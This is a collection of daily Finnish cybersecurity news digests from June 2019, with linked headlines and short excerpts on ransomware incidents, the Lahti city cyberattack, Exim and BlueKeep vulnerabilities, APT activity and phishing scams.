Florida city pays $600,000 to ransomware gang to have its data back

www.zdnet.com/article/florida-city-pays-600000-to-ransomware-gang-to-have-its-data-back/ The city council for Riviera Beach, Florida, voted this week to pay more than $600,000 to a ransomware gang so city officials could recover data that had been locked and encrypted more than three weeks ago. See also:

www.tivi.fi/uutiset/tv/33c14270-e69b-4c9b-a8d0-92e8448e8074

A neighbour’s invoice unexpectedly popped out of the printer of Heli, 42, from Turku. How on earth is that possible?

www.is.fi/digitoday/art-2000006148351.html?ref=rss Printers that have not been updated may let outsiders print on them freely. The manufacturer says it has since addressed the issue with updates. The direct-print application shows the name of the device being printed to. If two identical devices are close to each other, however, they can only be told apart by the device-specific identifier in the printer’s network name. That can only be seen by looking it up in the printer’s settings.

Tor Browser 8.5.2 Released to Fix Critical Vulnerability

www.bleepingcomputer.com/news/software/tor-browser-852-released-to-fix-critical-vulnerability/ Tor Browser 8.5.2 has been released to fix a critical vulnerability in Firefox that was fixed by Mozilla this week. It is strongly advised that all Tor users install this update as soon as possible. This week, Mozilla released Firefox 67.0.3 to fix a critical vulnerability discovered by Google Project Zero. The fix for this vulnerability has been ported to the bundled Firefox browser in Tor Browser 8.5.2. This JavaScript type confusion vulnerability was discovered being actively used in targeted attacks and thus needed immediate attention. This bug did not affect users running under the Safer or Safest security levels. See also:

www.zdnet.com/article/tor-browser-8-5-2-release-patches-firefox-flaw-being-exploited-in-the-wild/,

threatpost.com/tor-browser-update-critical-flaw/145857/ and

thehackernews.com/2019/06/tor-browser-firefox-hack.html

Russian APT hacked Iranian APT’s infrastructure back in 2017

www.zdnet.com/article/russian-apt-hacked-iranian-apts-infrastructure-back-in-2017/ Turla APT hacked Iran’s APT34 group and used its C&C servers to re-infect APT34 victims with its own malware. As fellow ZDNet writer Andrada Fiscutean once wrote in the fall of 2017: “Spies hack. But the best spies hack other spies.” That story revolved around a Virus Bulletin 2017 talk detailing several mysterious cases where APTs (advanced persistent threats, a technical term used to describe government-backed hacking units) appeared to have compromised the infrastructure of other APTs, either by accident or intentionally. While investigating this campaign for its own report, Symantec said it found evidence that sometime in November 2017, the Turla APT (which Symantec calls Waterbug) had hacked into the server infrastructure of an Iranian APT known as APT34 (also known as Oilrig or Crambus). See also:

www.bleepingcomputer.com/news/security/turla-espionage-group-hacks-oilrig-apt-infrastructure/

Linux Cryptominer Uses Virtual Machines to Attack Windows, macOS

www.bleepingcomputer.com/news/security/linux-cryptominer-uses-virtual-machines-to-attack-windows-macos/ A new cryptocurrency mining malware dubbed LoudMiner uses virtualization software to deploy a Linux XMRig coinminer variant on Windows and macOS systems via a Tiny Core Linux virtual machine. The malware comes bundled within cracked copies of Windows and macOS VST software such as Propellerhead Reason, Ableton Live, Sylenth1, Nexus, Reaktor, and AutoTune.

A scam message is spreading in Finnair’s name. Don’t click.

www.is.fi/digitoday/tietoturva/art-2000006149309.html Finnair says on Facebook that a phishing message is spreading in the company’s name on Facebook and Instagram. It is an advertisement disguised as a Finnair post, promising free flight tickets to anyone who hands over their details on the website linked from the post.

Daily NCSC-FI news followup 2019-06-19

Apu: A cyberattack on data networks could black out Finland. Are you prepared?

www.apu.fi/artikkelit/kyberhyokkays-tietoverkkoihin-voisi-pimentaa-suomen

China’s intelligence service recruits spies on LinkedIn; Finnish foreign-policy experts have also been approached

yle.fi/uutiset/3-10838995 The report was written by Mika Aaltola, programme director at the Finnish Institute of International Affairs.

Quick Detect: Exim “Return of the Wizard” Attack

isc.sans.edu/forums/diary/Quick+Detect+Exim+Return+of+the+Wizard+Attack/25052/ Thanks to our reader Alex for sharing some of his mail logs with the latest attempts to exploit CVE-2019-10149 (aka “Return of the Wizard”). The vulnerability affects Exim and was patched about two weeks ago. There are likely still plenty of vulnerable servers, but it looks like attackers are branching out and are hitting servers not running Exim as well.

ESS: Welfare consortium sent unnecessary invoices; the cause of the mess is being investigated, and the dodging of responsibility for what happened began immediately

www.ess.fi/uutiset/paijathame/art2549228 The erroneous invoices were related to an information-system update carried out at the consortium, during which incorrect invoicing occurred during a maintenance break. This happened because old payment transactions were automatically reprocessed in part.

ESS: The library system is working again in Lahti’s libraries; last week’s cyberattack will affect the city’s services beyond Midsummer

www.ess.fi/uutiset/paijathame/art2549182

Ryuk Ransomware Adds IP and Computer Name Blacklisting

www.bleepingcomputer.com/news/security/ryuk-ransomware-adds-ip-and-computer-name-blacklisting/ A new variant of the Ryuk Ransomware has been discovered that adds IP address and computer blacklisting so that matching computers will not be encrypted. When BleepingComputer asked Kremez why he felt they were making these checks, he told us that it was likely to avoid encrypting computers in Russia.

Oracle patches another actively-exploited WebLogic zero-day

www.zdnet.com/article/oracle-patches-another-actively-exploited-weblogic-zero-day/ Oracle released an out-of-band security update to fix a vulnerability in WebLogic servers that was being actively exploited in the real world to hijack users’ systems. Attacks using this vulnerability were first reported by Chinese security firm Knownsec 404 Team on June 15, last Saturday.

Daily NCSC-FI news followup 2019-06-18

Microsoft Operating Systems BlueKeep Vulnerability

www.us-cert.gov/ncas/alerts/AA19-168A BlueKeep (CVE-2019-0708) exists within the Remote Desktop Protocol (RDP) used by the Microsoft Windows OSs listed above. An attacker can exploit this vulnerability to perform remote code execution on an unprotected system.

Russian Hacks on U.S. Voting System Wider Than Previously Known

www.bloomberg.com/news/articles/2017-06-13/russian-breach-of-39-states-threatens-future-u-s-elections Russia’s cyberattack on the U.S. electoral system before Donald Trump’s election was far more widespread than has been publicly revealed, including incursions into voter databases and software systems in almost twice as many states as previously reported.

The Highly Dangerous ‘Triton’ Hackers Have Probed the US Grid

www.wired.com/story/triton-hackers-scan-us-power-grid/ Over the past several months, security analysts at the Electric Information Sharing and Analysis Center (E-ISAC) and the critical-infrastructure security firm Dragos have been tracking a group of sophisticated hackers carrying out broad scans of dozens of US power grid targets, apparently looking for entry points into their networks. Scanning alone hardly represents a serious threat. But these hackers, known as Xenotime, or sometimes as the Triton ac

Microsoft Management Console Bugs Allow Windows Takeover

threatpost.com/microsoft-management-console-bugs/145791/ A Windows interface that allows system administrators to configure and monitor systems from an admin level has several vulnerabilities that would allow an attacker to install malicious payloads and even take over a target, privileged machine.

GoldBrute: the botnet searching for RDP connections

www.pandasecurity.com/mediacenter/malware/goldbrute-botnet-rdp/ This new threat is GoldBrute, a botnet that is currently scanning the Internet, actively searching for Windows machines with the Remote Desktop Protocol (RDP) connection enabled. The researchers have discovered that the malware has compiled a list of 1.5 million unique systems with RDP enabled.

Threat Actors Use Older Cobalt Strike Versions to Blend In

www.bleepingcomputer.com/news/security/threat-actors-use-older-cobalt-strike-versions-to-blend-in/ Plenty of outdated Cobalt Strike servers exist in the wild, helping cybercriminals or giving security professionals the upper hand when testing corporate defenses; and they can be easily identified to stifle intrusions of any purpose.

Daily NCSC-FI news followup 2019-06-17

Bloomberg: Argentina Isn’t Ruling Out a Cyberattack in Major Power Outage

www.bloomberg.com/news/articles/2019-06-16/massive-power-failure-sweeps-across-argentina-and-uruguay “Though a cyberattack isn’t the primary hypothesis, it can’t be ruled out,” Argentine Energy Secretary Gustavo Lopetegui told reporters in Buenos Aires. A technical issue or simple humidity could have triggered the breakdown, said Carlos Garcia Pereira, head of Transener, Argentina’s largest power-transmission operator.

ESS: Cyberattack still paralyses City of Lahti services early in the week; systems will return to normal next week

www.ess.fi/uutiset/paijathame/art2548459 Investigation and clean-up work has been carried out on the city’s computers throughout the weekend. The systems have not yet been restored to working order, however, so the work continues on Monday. This also means that network use has been restricted. According to Marko Monni, the City of Lahti’s chief information officer, the city’s internal network is working normally, but services coming from the external network have to be cleaned separately. This means that the services that were shut down are checked and brought back into use one at a time.

ESS: The first systems are already working; checking for traces of the Lahti cyberattack takes time

www.ess.fi/uutiset/art2548622 The first systems and websites have been brought back into use after the cyberattack that hit the City of Lahti’s data network and workstations. The antivirus software detected the malware last Tuesday. At the moment the city’s internet connection is shut off.

Daily NCSC-FI news followup 2019-06-16

There would be room for improvement in the information security of every municipality; a thousand computers were infected in the cyberattack on Lahti

www.ess.fi/uutiset/kotimaa/art2548337 An incident like the Lahti cyberattack had been anticipated, says Kauto Huopio, chief specialist at the Finnish Transport and Communications Agency Traficom. Criminals are constantly looking for vulnerabilities in networks and strike at a weak point as soon as they spot one. It can be a matter of hours.

Telegram CEO Fingers China State Actors for DDoS Attack

threatpost.com/telegram-ceo-china-ddos-attack/145654/ The chief executive of secure messaging app Telegram is pointing the finger squarely at China as the culprit responsible for the distributed denial of service (DDoS) attack that it suffered on Wednesday.

Yubico to replace vulnerable YubiKey FIPS security keys

www.zdnet.com/article/yubico-to-replace-vulnerable-yubikey-fips-security-keys/ Yubico said today it plans to replace certain hardware security keys because of a firmware flaw that reduces the randomness of cryptographic keys generated by its devices.

Daily NCSC-FI news followup 2019-06-15

Exim email servers are now under attack

www.zdnet.com/article/exim-email-servers-are-now-under-attack/ At least two hacker groups have been identified carrying out attacks, one operating from a public internet server, and one using a server located on the dark web. See also:

www.cybereason.com/blog/new-pervasive-worm-exploiting-linux-exim-server-vulnerability

ThreatList: Ransomware Trojans Picking Up Steam in 2019

threatpost.com/threatlist-ransomware-trojans-picking-up-steam-in-2019/145718/ The report outlined popular trends in the malware space such as growing popularity of multimodular trojans and ransomware, and decreasing popularity of malicious cryptomining. Overall, cyberincidents grew by 11 percent from the first quarter of 2018 according to the report.

Mysterious Iranian group is hacking into DNA sequencers

www.zdnet.com/article/mysterious-iranian-group-is-hacking-into-dna-sequencers/ Web-based DNA sequencer applications are under attack from a mysterious hacker group using a still-unpatched zero-day to take control of targeted devices.

Experts: Spy used AI-generated face to connect with targets

phys.org/news/2019-06-experts-spy-ai-generated.html William Evanina, director of the U.S. National Counterintelligence and Security Center, said foreign spies routinely use fake social media profiles to home in on American targets, and accused China in particular of waging “mass scale” spying on LinkedIn.

Hacking these medical pumps is as easy as copying a booby-trapped file over the network

www.theregister.co.uk/2019/06/13/medical_workstation_vulnerabilities/ Two security vulnerabilities in medical workstations can be exploited by scumbags to hijack the devices and connected infusion pumps, potentially causing harm to patients, the US government revealed today.

U.S. Escalates Online Attacks on Russia’s Power Grid

www.nytimes.com/2019/06/15/us/politics/trump-cyber-russia-grid.html In interviews over the past three months, the officials described the previously unreported deployment of American computer code inside Russia’s grid and other targets as a classified companion to more publicly discussed action directed at Moscow’s disinformation and hacking units around the 2018 midterm elections.